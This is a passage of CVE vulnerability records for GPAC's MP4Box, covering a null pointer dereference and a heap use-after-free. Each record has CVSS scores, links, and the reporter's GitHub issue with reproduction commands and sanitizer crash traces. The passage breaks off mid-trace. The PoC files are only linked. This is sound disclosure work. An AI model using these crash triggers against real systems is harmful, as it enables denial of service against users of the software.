A vulnerability was found in GPAC 2.5-DEV-rev228-g11067ea92-master. It has been classified as problematic. This affects the function m2tsdmx_on_event of the file src/filters/dmx_m2ts.c of the component MP4Box. The manipulation leads to null pointer dereference. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The patch is named 8767ed0a77c4b02287db3723e92c2169f67c85d5. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-268791.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 1.7, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.1, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 3.3, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "LOCAL", "availabilityRequirement": "NOT_DEFINED", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/gpac/gpac/commit/8767ed0a77c4b02287db3723e92c2169f67c85d5" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2873" }, { "source": "cna@vuldb.com", "tags": [ "Broken Link" ], "url": "https://github.com/user-attachments/files/15801157/poc.zip" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268791" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?id.268791" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.356315" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/gpac/gpac/commit/8767ed0a77c4b02287db3723e92c2169f67c85d5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2873" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "https://github.com/user-attachments/files/15801157/poc.zip" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268791" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?id.268791" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.356315" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.5-dev-rev288-g11067ea92-master:*:*:*:*:*:*:*", "matchCriteriaId": "8CB1A488-697C-4770-B217-33A7F8403E77", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/2873
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
## version ```shell ./MP4Box -version MP4Box - GPAC version 2.5-DEV-rev228-g11067ea92-master (c) 2000-2024 Telecom Paris distributed under LGPL v2.1+ - https://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` ## reproduce Complie and run ``` ./configure --enable-sanitizer make ./MP4Box -dash 1000 -out /dev/null poc3 ``` Information ```shell [MPEG-2 TS] PID 1024: Bad Adaptation Extension found [MPEG-2 TS] PID 1024: Bad Adaptation Extension found [MPEG-2 TS] TS Packet 3 is scrambled - not supported [MPEG-2 TS] PID 1863: Bad Adaptation Extension found [MPEG-2 TS] TS Packet 5 is scrambled - not supported [MPEG-2 TS] TS Packet 6 is scrambled - not supported [MPEG-2 TS] TS Packet 7 is scrambled - not supported [MPEG-2 TS] TS Packet 8 is scrambled - not supported [MPEG-2 TS] TS Packet 9 is scrambled - not supported [MPEG-2 TS] TS Packet 10 is scrambled - not supported [MPEG-2 TS] TS Packet 11 is scrambled - not supported [MPEG-2 TS] TS Packet 12 is scrambled - not supported [MPEG-2 TS] TS Packet 13 is scrambled - not supported [MPEG-2 TS] TS Packet 14 is scrambled - not supported [MPEG-2 TS] TS Packet 15 is scrambled - not supported [MPEG-2 TS] TS Packet 16 is scrambled - not supported [MPEG-2 TS] TS Packet 17 is scrambled - not supported [MPEG-2 TS] TS Packet 18 is scrambled - not supported [MPEG-2 TS] TS Packet 19 is scrambled - not supported [MPEG-2 TS] TS Packet 20 is scrambled - not supported [MPEG-2 TS] TS Packet 21 is scrambled - not supported [MPEG-2 TS] TS Packet 22 is scrambled - not supported [MPEG-2 TS] TS Packet 23 is scrambled - not supported [MPEG-2 TS] TS Packet 24 does not start with sync marker [MPEG-2 TS] TS Packet 25 AF size is 71 when it must be 183 for AF type 2 [MPEG-2 TS] TS Packet 26 does not start with sync marker [MPEG-2 TS] TS Packet 27 does not start with sync marker [MPEG-2 TS] PID 1863: Bad Adaptation Extension found [MPEG-2 TS] PID 18 AF Location descriptor found - URL TR▒ [MPEG-2 TS] PID 18: Bad Adaptation Descriptor found (tag 0) size is 0 but only 1 bytes available [MPEG-2 TS] TS Packet 30 does not start with sync marker [MPEG-2 TS] TS Packet 31 does not start with sync marker [MPEG-2 TS] TS Packet 32 does not start with sync marker [MPEG-2 TS] TS Packet 33 does not start with sync marker [MPEG-2 TS] TS Packet 34 does not start with sync marker [MPEG-2 TS] TS Packet 35 does not start with sync marker [MPEG-2 TS] TS Packet 36 is scrambled - not supported [MPEG-2 TS] TS Packet 37 is scrambled - not supported [MPEG-2 TS] TS Packet 38 does not start with sync marker [MPEG-2 TS] TS Packet 39 does not start with sync marker [MPEG-2 TS] TS Packet 40 does not start with sync marker [MPEG-2 TS] TS Packet 41 does not start with sync marker [MPEG-2 TS] TS Packet 42 does not start with sync marker [MPEG-2 TS] TS Packet 43 does not start with sync marker [MPEG-2 TS] TS Packet 44 does not start with sync marker [MPEG-2 TS] TS Packet 45 does not start with sync marker [MPEG-2 TS] PID 1024: Bad Adaptation Extension found [MPEG-2 TS] PID 1024: Bad Adaptation Extension found [MPEG-2 TS] TS Packet 48 is scrambled - not supported [MPEG-2 TS] TS Packet 49 is scrambled - not supported [MPEG-2 TS] TS Packet 50 is scrambled - not supported [MPEG-2 TS] TS Packet 51 does not start with sync marker [MPEG-2 TS] TS Packet 52 does not start with sync marker [MPEG-2 TS] TS Packet 53 does not start with sync marker [MPEG-2 TS] TS Packet 54 does not start with sync marker [MPEG-2 TS] TS Packet 55 does not start with sync marker [MPEG-2 TS] TS Packet 56 does not start with sync marker [MPEG-2 TS] TS Packet 57 is scrambled - not supported [MPEG-2 TS] TS Packet 58 does not start with sync marker [MPEG-2 TS] TS Packet 59 is scrambled - not supported [MPEG-2 TS] TS Packet 60 is scrambled - not supported [MPEG-2 TS] TS Packet 61 does not start with sync marker [MPEG-2 TS] TS Packet 62 does not start with sync marker [MPEG-2 TS] TS Packet 63 does not start with sync marker [MPEG-2 TS] TS Packet 64 does not start with sync marker [MPEG-2 TS] TS Packet 65 does not start with sync marker [MPEG-2 TS] TS Packet 66 does not start with sync marker [MPEG-2 TS] TS Packet 67 does not start with sync marker [MPEG-2 TS] TS Packet 68 does not start with sync marker [MPEG-2 TS] PID 1863: Bad Adaptation Extension found [MPEG-2 TS] TS Packet 70 does not start with sync marker [MPEG-2 TS] TS Packet 71 does not start with sync marker [MPEG-2 TS] TS Packet 72 does not start with sync marker [MPEG-2 TS] TS Packet 73 does not start with sync marker [MPEG-2 TS] TS Packet 74 does not start with sync marker [MPEG-2 TS] TS Packet 75 does not start with sync marker [MPEG-2 TS] TS Packet 76 is scrambled - not supported [MPEG-2 TS] TS Packet 77 is scrambled - not supported [MPEG-2 TS] TS Packet 78 does not start with sync marker [MPEG-2 TS] TS Packet 79 does not start with sync marker [MPEG-2 TS] TS Packet 80 does not start with sync marker [MPEG-2 TS] TS Packet 81 does not start with sync marker [MPEG-2 TS] TS Packet 82 does not start with sync marker [MPEG-2 TS] TS Packet 83 does not start with sync marker [MPEG-2 TS] TS Packet 84 does not start with sync marker [MPEG-2 TS] TS Packet 85 is scrambled - not supported [MPEG-2 TS] TS Packet 86 does not start with sync marker [MPEG-2 TS] TS Packet 87 does not start with sync marker [MPEG-2 TS] TS Packet 88 does not start with sync marker [MPEG-2 TS] TS Packet 89 is scrambled - not supported [MPEG-2 TS] TS Packet 90 is scrambled - not supported [MPEG-2 TS] PID 1863: Bad Adaptation Extension found [MPEG-2 TS] TS Packet 93 is scrambled - not supported [MPEG-2 TS] TS Packet 94 is scrambled - not supported [MPEG-2 TS] TS Packet 95 does not start with sync marker [MPEG-2 TS] TS Packet 96 does not start with sync marker [MPEG-2 TS] TS Packet 97 does not start with sync marker [MPEG-2 TS] TS Packet 98 does not start with sync marker [MPEG-2 TS] TS Packet 99 does not start with sync marker [MPEG-2 TS] PID 1024: Bad Adaptation Extension found [MPEG-2 TS] TS Packet 101 does not start with sync marker [MPEG-2 TS] TS Packet 102 is scrambled - not supported [MPEG-2 TS] TS Packet 103 is scrambled - not supported [MPEG-2 TS] TS Packet 104 is scrambled - not supported [MPEG-2 TS] TS Packet 105 does not start with sync marker [MPEG-2 TS] TS Packet 106 does not start with sync marker [MPEG-2 TS] TS Packet 107 does not start with sync marker [MPEG-2 TS] TS Packet 108 does not start with sync marker [MPEG-2 TS] TS Packet 109 does not start with sync marker [MPEG-2 TS] TS Packet 110 is scrambled - not supported [MPEG-2 TS] TS Packet 112 does not start with sync marker [MPEG-2 TS] TS Packet 113 does not start with sync marker [MPEG-2 TS] TS Packet 114 does not start with sync marker [MPEG-2 TS] TS Packet 116 does not start with sync marker [MPEG-2 TS] TS Packet 117 does not start with sync marker [MPEG-2 TS] TS Packet 118 does not start with sync marker [MPEG-2 TS] TS Packet 119 does not start with sync marker [MPEG-2 TS] TS Packet 120 does not start with sync marker [MPEG-2 TS] PID 1024: Bad Adaptation Extension found [MPEG-2 TS] TS Packet 122 is scrambled - not supported [MPEG-2 TS] TS Packet 123 is scrambled - not supported [MPEG-2 TS] TS Packet 124 is scrambled - not supported [MPEG-2 TS] TS Packet 125 is scrambled - not supported [MPEG-2 TS] TS Packet 126 is scrambled - not supported [MPEG-2 TS] TS Packet 127 is scrambled - not supported [MPEG-2 TS] TS Packet 128 is scrambled - not supported [MPEG-2 TS] TS Packet 129 is scrambled - not supported [MPEG-2 TS] TS Packet 130 is scrambled - not supported [MPEG-2 TS] TS Packet 131 is scrambled - not supported [MPEG-2 TS] TS Packet 132 is scrambled - not supported [MPEG-2 TS] TS Packet 133 is scrambled - not supported [MPEG-2 TS] TS Packet 134 is scrambled - not supported [MPEG-2 TS] TS Packet 135 is scrambled - not supported [MPEG-2 TS] TS Packet 136 is scrambled - not supported [MPEG-2 TS] TS Packet 137 is scrambled - not supported [MPEG-2 TS] TS Packet 138 is scrambled - not supported [MPEG-2 TS] TS Packet 139 is scrambled - not supported [MPEG-2 TS] TS Packet 140 is scrambled - not supported [MPEG-2 TS] TS Packet 141 is scrambled - not supported [MPEG-2 TS] PID 1863: Bad Adaptation Extension found [MPEG-2 TS] TS Packet 143 does not start with sync marker [MPEG-2 TS] TS Packet 144 does not start with sync marker [MPEG-2 TS] PID 1863: Bad Adaptation Extension found [MPEG-2 TS] TS Packet 146 does not start with sync marker [MPEG-2 TS] TS Packet 147 is scrambled - not supported [MPEG-2 TS] TS Packet 148 is scrambled - not supported [MPEG-2 TS] TS Packet 149 does not start with sync marker [MPEG-2 TS] PID 1024: Bad Adaptation Extension found [MPEG-2 TS] TS Packet 151 does not start with sync marker [MPEG-2 TS] TS Packet 152 is scrambled - not supported [MPEG-2 TS] TS Packet 153 is scrambled - not supported [MPEG-2 TS] TS Packet 154 is scrambled - not supported [MPEG-2 TS] TS Packet 155 does not start with sync marker [MPEG-2 TS] TS Packet 156 does not start with sync marker [MPEG-2 TS] TS Packet 157 does not start with sync marker [MPEG-2 TS] TS Packet 158 is scrambled - not supported [MPEG-2 TS] TS Packet 159 is scrambled - not supported [MPEG-2 TS] TS Packet 160 is scrambled - not supported [MPEG-2 TS] TS Packet 161 has error (PID could be 5120) [MPEG-2 TS] TS Packet 162 does not start with sync marker [MPEG-2 TS] TS Packet 163 does not start with sync marker [MPEG-2 TS] TS Packet 164 does not start with sync marker [MPEG-2 TS] TS Packet 165 does not start with sync marker [MPEG-2 TS] PID 1863: Bad Adaptation Extension found [MPEG-2 TS] TS Packet 167 does not start with sync marker [MPEG-2 TS] TS Packet 168 is scrambled - not supported [MPEG-2 TS] TS Packet 169 is scrambled - not supported [MPEG-2 TS] TS Packet 170 does not start with sync marker [MPEG-2 TS] TS Packet 171 does not start with sync marker [MPEG-2 TS] TS Packet 172 is scrambled - not supported [MPEG-2 TS] PID 1024: Bad Adaptation Extension found [MPEG-2 TS] TS Packet 174 does not start with sync marker [MPEG-2 TS] TS Packet 175 does not start with sync marker [MPEG-2 TS] TS Packet 176 does not start with sync marker [MPEG-2 TS] TS Packet 177 does not start with sync marker [MPEG-2 TS] TS Packet 178 does not start with sync marker [MPEG-2 TS] TS Packet 179 does not start with sync marker [MPEG-2 TS] PID 1863: Bad Adaptation Extension found [MPEG-2 TS] TS Packet 181 does not start with sync marker [MPEG-2 TS] TS Packet 182 is scrambled - not supported [MPEG-2 TS] TS Packet 183 is scrambled - not supported [MPEG-2 TS] TS Packet 184 is scrambled - not supported [MPEG-2 TS] TS Packet 185 is scrambled - not supported [MPEG-2 TS] TS Packet 186 is scrambled - not supported [MPEG-2 TS] TS Packet 187 is scrambled - not supported [MPEG-2 TS] TS Packet 189 does not start with sync marker [MPEG-2 TS] TS Packet 190 does not start with sync marker [MPEG-2 TS] TS Packet 191 is scrambled - not supported [MPEG-2 TS] TS Packet 192 is scrambled - not supported [MPEG-2 TS] TS Packet 193 is scrambled - not supported [MPEG-2 TS] TS Packet 194 does not start with sync marker [MPEG-2 TS] TS Packet 195 does not start with sync marker [MPEG-2 TS] TS Packet 196 does not start with sync marker [MPEG-2 TS] PID 1024: Bad Adaptation Extension found [MPEG-2 TS] PID 1024: Bad Adaptation Extension found [MPEG-2 TS] TS Packet 3 is scrambled - not supported [MPEG-2 TS] PID 1863: Bad Adaptation Extension found [MPEG-2 TS] TS Packet 5 is scrambled - not supported [MPEG-2 TS] TS Packet 6 is scrambled - not supported [MPEG-2 TS] TS Packet 7 is scrambled - not supported [MPEG-2 TS] TS Packet 8 is scrambled - not supported [MPEG-2 TS] TS Packet 9 is scrambled - not supported [MPEG-2 TS] TS Packet 10 is scrambled - not supported [MPEG-2 TS] TS Packet 11 is scrambled - not supported [MPEG-2 TS] TS Packet 12 is scrambled - not supported [MPEG-2 TS] TS Packet 13 is scrambled - not supported [MPEG-2 TS] TS Packet 14 is scrambled - not supported [MPEG-2 TS] TS Packet 15 is scrambled - not supported [MPEG-2 TS] TS Packet 16 is scrambled - not supported [MPEG-2 TS] TS Packet 17 is scrambled - not supported [MPEG-2 TS] TS Packet 18 is scrambled - not supported [MPEG-2 TS] TS Packet 19 is scrambled - not supported [MPEG-2 TS] TS Packet 20 is scrambled - not supported [MPEG-2 TS] TS Packet 21 is scrambled - not supported [MPEG-2 TS] TS Packet 22 is scrambled - not supported [MPEG-2 TS] TS Packet 23 is scrambled - not supported [MPEG-2 TS] TS Packet 24 does not start with sync marker [MPEG-2 TS] TS Packet 25 AF size is 71 when it must be 183 for AF type 2 [MPEG-2 TS] PID 1863: Bad Adaptation Extension found [MPEG-2 TS] PID 18 AF Location descriptor found - URL TR▒ [MPEG-2 TS] PID 18: Bad Adaptation Descriptor found (tag 0) size is 0 but only 1 bytes available filters/dmx_m2ts.c:1215:40: runtime error: member access within null pointer of type 'struct GF_M2TS_ES' ``` ## poc [poc.zip](https://github.com/user-attachments/files/15801157/poc.zip)
Null pointer deference in filters/dmx_m2ts.c:1215
https://api.github.com/repos/gpac/gpac/issues/2873/comments
5
2024-06-12T08:32:57Z
2024-09-27T11:43:26Z
https://github.com/gpac/gpac/issues/2873
2,348,158,622
2,873
6,087
CVE-2024-6064
2024-06-17T21:15:51.727
A vulnerability was found in GPAC 2.5-DEV-rev228-g11067ea92-master. It has been declared as problematic. This vulnerability affects the function xmt_node_end of the file src/scene_manager/loader_xmt.c of the component MP4Box. The manipulation leads to use after free. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The name of the patch is f4b3e4d2f91bc1749e7a924a8ab171af03a355a8/c1b9c794bad8f262c56f3cf690567980d96662f5. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-268792.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.1, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "LOCAL", "availabilityRequirement": "NOT_DEFINED", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/gpac/gpac/commit/c1b9c794bad8f262c56f3cf690567980d96662f5" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2874" }, { "source": "cna@vuldb.com", "tags": [ "Broken Link" ], "url": "https://github.com/user-attachments/files/15801189/poc.zip" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268792" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268792" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.356316" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/gpac/gpac/commit/c1b9c794bad8f262c56f3cf690567980d96662f5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2874" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "https://github.com/user-attachments/files/15801189/poc.zip" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268792" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268792" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.356316" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.5-dev-rev288-g11067ea92-master:*:*:*:*:*:*:*", "matchCriteriaId": "8CB1A488-697C-4770-B217-33A7F8403E77", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/gpac/gpac/issues/2874
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
## version ```shell ./MP4Box -version MP4Box - GPAC version 2.5-DEV-rev228-g11067ea92-master (c) 2000-2024 Telecom Paris distributed under LGPL v2.1+ - https://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` ## reproduce Complie and run ``` ./configure --enable-sanitizer make ./MP4Box -info poc4 ``` Information ```shell XMT: MPEG-4 (XMT) Scene Parsing [XMT Parsing] Warning: descriptor InitialObjectDescriptor defined outside scene scope - skipping (line 10) ================================================================= ==18912==ERROR: AddressSanitizer: heap-use-after-free on address 0x607000032052 at pc 0x7f54fc2647ed bp 0x7ffce79c0f30 sp 0x7ffce79c0f20 READ of size 2 at 0x607000032052 thread T0 #0 0x7f54fc2647ec in xmt_resolve_od_links scene_manager/loader_xmt.c:531 #1 0x7f54fc2666f0 in load_xmt_run scene_manager/loader_xmt.c:3148 #2 0x7f54fc93db85 in ctxload_process filters/load_bt_xmt.c:522 #3 0x7f54fc67ed9d in gf_filter_process_task filter_core/filter.c:3164 #4 0x7f54fc64a599 in gf_fs_thread_proc filter_core/filter_session.c:2145 #5 0x7f54fc64e903 in gf_fs_run filter_core/filter_session.c:2452 #6 0x7f54fc0cc145 in gf_media_import media_tools/media_import.c:1239 #7 0x5647e6b54da4 in convert_file_info /home/ubuntu/gpac_testt/gpac/applications/mp4box/fileimport.c:130 #8 0x5647e6b2212d in mp4box_main /home/ubuntu/gpac_testt/gpac/applications/mp4box/mp4box.c:6398 #9 0x7f54f989fc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #10 0x5647e6b01579 in _start (/home/ubuntu/gpac_testt/gpac/bin/gcc/MP4Box+0x87579) 0x607000032052 is located 2 bytes inside of 80-byte region [0x607000032050,0x6070000320a0) freed by thread T0 here: #0 0x7f54fe7b17a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8) #1 0x7f54fbfbab49 in gf_odf_del_iod odf/odf_code.c:442 #2 0x7f54fb94c1ff in xml_sax_node_end utils/xml_parser.c:265 #3 0x7f54fb94f965 in xml_sax_parse utils/xml_parser.c:867 #4 0x7f54fb951cce in gf_xml_sax_parse_intern utils/xml_parser.c:1104 #5 0x7f54fb952507 in gf_xml_sax_parse utils/xml_parser.c:1132 #6 0x7f54fb952818 in xml_sax_read_file utils/xml_parser.c:1219 #7 0x7f54fb9539aa in gf_xml_sax_parse_file utils/xml_parser.c:1331 #8 0x7f54fc2666ba in load_xmt_run scene_manager/loader_xmt.c:3144 #9 0x7f54fc93db85 in ctxload_process filters/load_bt_xmt.c:522 #10 0x7f54fc67ed9d in gf_filter_process_task filter_core/filter.c:3164 #11 0x7f54fc64a599 in gf_fs_thread_proc filter_core/filter_session.c:2145 #12 0x7f54fc64e903 in gf_fs_run filter_core/filter_session.c:2452 #13 0x7f54fc0cc145 in gf_media_import media_tools/media_import.c:1239 #14 0x5647e6b54da4 in convert_file_info /home/ubuntu/gpac_testt/gpac/applications/mp4box/fileimport.c:130 #15 0x5647e6b2212d in mp4box_main /home/ubuntu/gpac_testt/gpac/applications/mp4box/mp4box.c:6398 #16 0x7f54f989fc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) previously allocated by thread T0 here: #0 0x7f54fe7b1b40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40) #1 0x7f54fbfba932 in gf_odf_new_iod odf/odf_code.c:415 #2 0x7f54fbfc3fe3 in gf_odf_desc_new odf/odf_codec.c:244 #3 0x7f54fc278e6f in xmt_parse_descriptor scene_manager/loader_xmt.c:1951 #4 0x7f54fc27bf5d in xmt_node_start scene_manager/loader_xmt.c:2578 #5 0x7f54fb94cd55 in xml_sax_node_start utils/xml_parser.c:308 #6 0x7f54fb94fe5d in 